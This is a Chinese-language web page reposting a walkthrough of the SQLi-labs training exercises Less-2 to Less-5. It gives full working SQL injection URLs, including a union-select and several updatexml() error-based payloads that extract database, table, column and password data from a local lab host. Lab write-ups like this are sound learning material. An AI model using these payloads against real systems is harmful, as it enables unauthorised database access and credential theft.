当前位置: 首页 > news >正文

SQL labs-SQL注入(二)

news 2025/8/14 22:21:15

环境搭建参考

SQL注入(一)

一,SQL labs-less2。

http://192.168.61.206:8001/Less-2/?id=-1 union select 1,2,group_concat(username , password) from users--+

与第一关没什么太大的不同,唯一区别就是闭合方式为数字型。

二,SQL labs-less3。

直接输入:

http://172.168.10.129:8001/Less-3/?id=1\

得到闭合符,其余步骤与less1,less2一致。

less4解题思路与3一致,在此不做赘述。

三,报错注入。

1,先找出闭合符。

2,报错注入,得到库名。


http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(%2f,(select database()),%2f),1)--+

updatexml():括号内写目标文件,文件路径,修改内容。

ox3e:是“>”的16进制编码。

concat()  拼接输出。

3,以此类推,得到表名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x3e),1)--+

4,得到敏感表名内部的字段名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name ='users'),0x3e),1)--+

5,得到敏感数据。

http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(0x3e,(select group_concat(password)from users),0x3e),1)--+

http://www.lryc.cn/news/408510.html

相关文章:

  • go 语言踏出第一步
  • SpringBoot-21 SpringBoot微服务的发布与部署(3种方式)
  • 在occluded Person Re-ID中,选择clip还是ViT作为backbone?
  • Linuxnat网络配置
  • 77.WEB渗透测试-信息收集-框架组件识别利用(1)
  • ExcelJS:轻松实现Excel文件的读取、操作与写入
  • Java 多线程技术详解
  • 一份简单实用的MATLAB M语言编码风格指南
  • ubuntu 环境下soc 使用qemu
  • Centos安装、迁移gitlab
  • 【Python机器学习】朴素贝叶斯——使用Python进行文本分类
  • 【linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
  • Spring条件装配:灵活配置你的应用
  • 【前端 08】简单学习js字符串
  • 【LLM】-07-提示工程-聊天机器人
  • AvaloniaUI的学习
  • 刷题——快速排序
  • VPN,实时数据显示,多线程,pip,venv
  • 自然语言处理(NLP)
  • Spring Boot集成Spire.doc实现对word的操作
  • 在Spring Boot中优化if-else语句
  • 【Django】开源前端库bootstrap,常用
  • 2024后端开发面试题总结
  • opencascade AIS_Manipulator源码学习
  • Hadoop、Hive、HBase、数据集成、Scala阶段测试
  • go语言day19 使用git上传包文件到github Gin框架入门
  • Ubuntu升级软件或系统
  • 【Redis】Centos7 安装 redis(详细教程)
  • Hakuin:一款自动化SQL盲注(BSQLI)安全检测工具
  • 在 Postman 中设置全局 token